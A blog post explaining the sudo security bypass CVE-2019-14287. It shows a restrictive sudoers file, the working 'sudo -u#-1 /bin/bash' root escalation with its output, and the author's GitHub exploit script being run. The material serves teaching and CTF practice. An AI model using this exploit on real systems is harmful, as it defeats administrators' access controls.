Sudo Security Bypass
Recently there was a big commotion about sudo or ‘superuser do‘. Apparently there was a flaw in this immense popular program which enables Linux users to create a more granular security structure on their operating system. Sudo gives the system admin the possibility to hand out permission and control which user can use what program and if they can act temporarily as root or NOT.
With the found flaw it is possible for a user to run the program even if the sysadmin had restricted this. To use this flaw it is important to remember that the user in question needs to have some sort of sudo permission. If the user has non sudo permission, there is no sudo to exploit! Also the flaw only exists in the sudo version prior to 1.8.28, because in this version the flaw is patched.
# # This file MUST be edited with the 'visudo' command as root. # # Please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file. # # See the man page for details on how to write a sudoers file. # Defaults env_reset Defaults mail_badpass Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" # Host alias specification # User alias specification test ALL=(ALL,!root) /bin/bash # Cmnd alias specification # User privilege specification root ALL=(ALL:ALL) ALL # Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL # See sudoers(5) for more information on "#include" directives: #includedir /etc/sudoers.d
In the sudoers file there is a user (test). For this user it’s restricted to run /bin/bash as root.
test@cyberspace:~$ sudo /bin/bash [sudo] password for test: Sorry, user test is not allowed to execute '/bin/bash' as root on cyberspace.
This is how it normally behaves. The !root restriction in the sudoers file is doing its work.
test@cyberspace:~$ sudo -u#-1 /bin/bash root@cyberspace:/home/test# id uid=0(root) gid=1001(test) groups=1001(test)
But with the usage of the flaw, the user test just ran /bin/bash as root, making him: root!
Because I like to do CTF’s, I created a small script that checks if the sudo version is vulnerable and exploits the flaw with the given sudo permission.
test@cyberspace:~$ git clone https://github.com/n0w4n/CVE-2019-14287.git Cloning into 'CVE-2019-14287'... remote: Enumerating objects: 22, done. remote: Counting objects: 100% (22/22), done. remote: Compressing objects: 100% (21/21), done. remote: Total 22 (delta 7), reused 0 (delta 0), pack-reused 0 Unpacking objects: 100% (22/22), done. test@cyberspace:~$ cd CVE-2019-14287/ test@cyberspace:~/CVE-2019-14287$ bash sudo.sh [-] This user has sudo rights [-] Checking sudo version [-] This sudo version is vulnerable [-] Trying to exploit root@cyberspace:/home/test/CVE-2019-14287# id uid=0(root) gid=1001(test) groups=1001(test)
The script can be found on my github page: https://github.com/n0w4n/CVE-2019-14287
Also…..don’t forget to update your Linux version!!! Happy hacking…